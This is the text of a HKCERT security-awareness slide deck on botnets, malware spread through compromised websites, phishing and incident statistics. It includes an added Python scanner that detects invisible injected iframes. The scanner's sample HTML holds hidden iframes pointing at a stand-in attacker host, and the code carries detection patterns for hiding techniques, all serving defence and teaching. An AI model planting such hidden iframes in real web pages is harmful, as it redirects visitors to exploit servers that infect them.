and Defense
SC Leung
Senior Consultant
Agenda
Security Threat Landscape
Attacks targeting our vulnerabilities
– System and applications
– Human
New Phishing Tactic Targets Tabs
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ (proof of concept included)
http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/
Botnet (roBot Network) is the major threat
Diagram: Bot Herder -> Command & Control Centre (C&C) -> Bots (your computers!) -> attacks -> victims
Maturity of the Underground Economy
Chart: sophistication
Malware 2.0
– Propagation
– Forming a botnet
– Manage
– Update
– Survive adversity: encryption or obfuscation, morphing
Malware Propagation channels
Diagram: Document, Executables, Website -> Malware
– Fake security software
– Fake video player codec
– Embedded malware in PDF or Office files (Zeus botnet served PDF malware, Apr 2010; image by Websense)
– Legitimate and trusted websites compromised, used to redirect users to malicious websites (via injected invisible iframes)
– Most significant channel: web admins are unable to detect and mitigate the risks
Malware Propagation via websites
PHPNuke.org web site hacked in May 2010
Targeted Attacks
Attacks Following Money
– Social networking
– P2P file sharing
– Services
Social network data leakage
Client Side attacks via Social Network Sites
Submitting the malware to VirusTotal.com
Only a small portion of scanners can identify the malware
Redirection of attacks to a central exploit server
Malicious servers redirect victims to the Exploit Server, which serves as a central delivery point
Source: http://www.honeynet.org/papers/mws/KYE-Malicious_Web_Servers.htm
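The slides above describe two halves of one delivery chain: a compromised legitimate site carries an injected invisible iframe, and that iframe bounces the visitor to a central exploit server. The scanner below is an added example, not code from the original slides or from HKCERT; it walks a page's HTML and flags iframes that are invisible either by their own attributes and inline style or by sitting inside a hidden ancestor, noting when the frame points at a host other than the page's own. The sample page, the hiding heuristics and the attacker host "evil.example" are constructed for illustration.

```python
"""Scan a web page for invisible <iframe> elements of the kind injected into
compromised legitimate sites to bounce visitors to a central exploit server.

Added example (not HKCERT code). Heuristics and the sample page are
constructed; "evil.example" is a made-up attacker host."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a legitimate page with one normal embed and two injected,
# invisible iframes (one hidden by itself, one inside a display:none container).
SAMPLE_HTML = """
<html><body>
<h1>Welcome to example.org</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="http://evil.example/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<div style="display:none"><iframe src="http://evil.example/x.php"></iframe></div>
</body></html>
"""

# Inline-style patterns that make an element invisible or push it off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)"
    r"|(?:left|top)\s*:\s*-\d{3,}",
    re.I,
)
# Elements without a closing tag; they must not be pushed on the open-tag stack.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "param", "source", "track", "wbr"}


def is_hidden(attrs):
    """True if the element's own attributes render it invisible."""
    style = attrs.get("style") or ""
    if HIDDEN_STYLE.search(style):
        return True
    for dim in ("width", "height"):
        value = (attrs.get(dim) or "").strip().rstrip("px%")
        if value.isdigit() and int(value) <= 1:   # 0x0 or 1x1 frames
            return True
    return "hidden" in attrs


class HiddenIframeFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.hidden_depth = 0   # >0 while inside an element styled as hidden
        self.stack = []         # (tag, counted_as_hidden) for open elements
        self.findings = []      # (iframe src, [reasons])

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden = is_hidden(attrs)
        if tag == "iframe" and (hidden or self.hidden_depth):
            src = attrs.get("src") or ""
            reasons = []
            if hidden:
                reasons.append("hidden by own attributes/style")
            if self.hidden_depth:
                reasons.append("inside hidden container")
            host = urlparse(src).hostname or ""
            if host and host != self.page_host and not host.endswith("." + self.page_host):
                reasons.append("third-party host " + host)
            self.findings.append((src, reasons))
        if tag not in VOID:
            self.stack.append((tag, hidden))
            if hidden:
                self.hidden_depth += 1

    def handle_endtag(self, tag):
        # Pop back to the matching open tag (tolerating unclosed children),
        # undoing the hidden-depth contributions of everything popped.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                self.hidden_depth -= sum(1 for _, h in self.stack[i:] if h)
                del self.stack[i:]
                return


def find_hidden_iframes(html, page_host):
    """Return [(src, reasons)] for every iframe hidden itself or by an ancestor."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_HTML, "example.org"):
        print(src, "->", "; ".join(reasons))
```

Run against the sample, the visible YouTube embed passes while both injected frames are reported, the second one only because its parent `div` is `display:none`; a scan that looked at the iframe's own attributes alone would miss it. A web admin can run a check like this over a site's served pages to catch the injected redirect the slides describe before visitors are bounced to the exploit server.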
Mobile Computing
Chained exploit
Consequence of Attack
Consequences of Security Exposure
Mitigation Strategies Revisited
What do we do?
– International Cyber Drill Exercise
– Collaboration: good example of the Conficker Working Group
Awareness, Education and Training
– Public
– ISPs
Proactivity in Incident Handling in HKCERT
Incident Reports Statistics (3 Apr to 30 Sep 2009)
Traditional report vs Proactive Discovery (searching for incidents that are not reported)
– Traditional report: 493 (60%); Proactive Discovery: 330 (40%)
Conclusion:
– Proactive Discovery is becoming a key source of incident reports
– Overseas and referral reports make up a significant portion
– We are aware that more resources are required for handling external communication and for developing automated searching capability
What can you do – infrastructure?
– Personal
– Company
HKCERT Guidelines
http://www.hkcert.org/english/sguide_faq/home.html
Point of Contact